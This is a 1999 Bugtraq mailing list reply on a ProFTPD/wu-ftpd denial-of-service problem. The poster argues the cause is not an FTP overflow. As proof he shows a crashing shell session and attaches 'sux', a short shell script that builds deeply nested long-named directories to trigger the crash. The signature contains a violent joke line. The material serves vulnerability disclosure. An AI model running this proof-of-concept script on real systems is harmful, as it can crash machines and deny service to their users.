Bugtraq mailing list archives

Re: Pro/wuFTPD DoS


From: Ultor () SOWATECH COM PL (Ultor)
Date: Sat, 13 Feb 1999 19:18:15 +0100


Hi

yes,

kills patched ProFTPD dead.

-----snip-----

#!/usr/local/bin/perl
# ftpd thingy
# bubba () bubba org

[CUTED]

-----snip-----

Ken Williams
jkwilli2 () csc ncsu edu


Hmmm, I think that the problem here isn't an overflow in ProFTPD.
Here is a proof.

First run the attached 'sux' to make directories ...

----- snip -------
# pwd
/mnt/
# ./sux
    OK, now just cd into those directories
# cd A*
[CUTED]
# cd A*
ultor:/mnt/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# cd A*


Welcome to Linux 2.0.35.

ultor login:

----- snip -------

nice heh :)


Greeetz

-------------------------------------------------------------
 "I hack the heads off little girls and put them on my wall"
  ULT0R [Ultor () sowatech com pl] - NETWORK SECURITY ADVISER

Attachment: sux

#!/bin/sh
#
# stupid thing which shows overflows in some toolz
#
# Contact: ultor () sowatech com pl

STRING=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

i=0

while [ $i -le 15 ]
do
  i=`expr $i + 1`
  mkdir $STRING
  cd $STRING
  echo DIR MADE $i
done
echo NOW JUST DO $ cd XXXXXX* UNTIL IT CRASH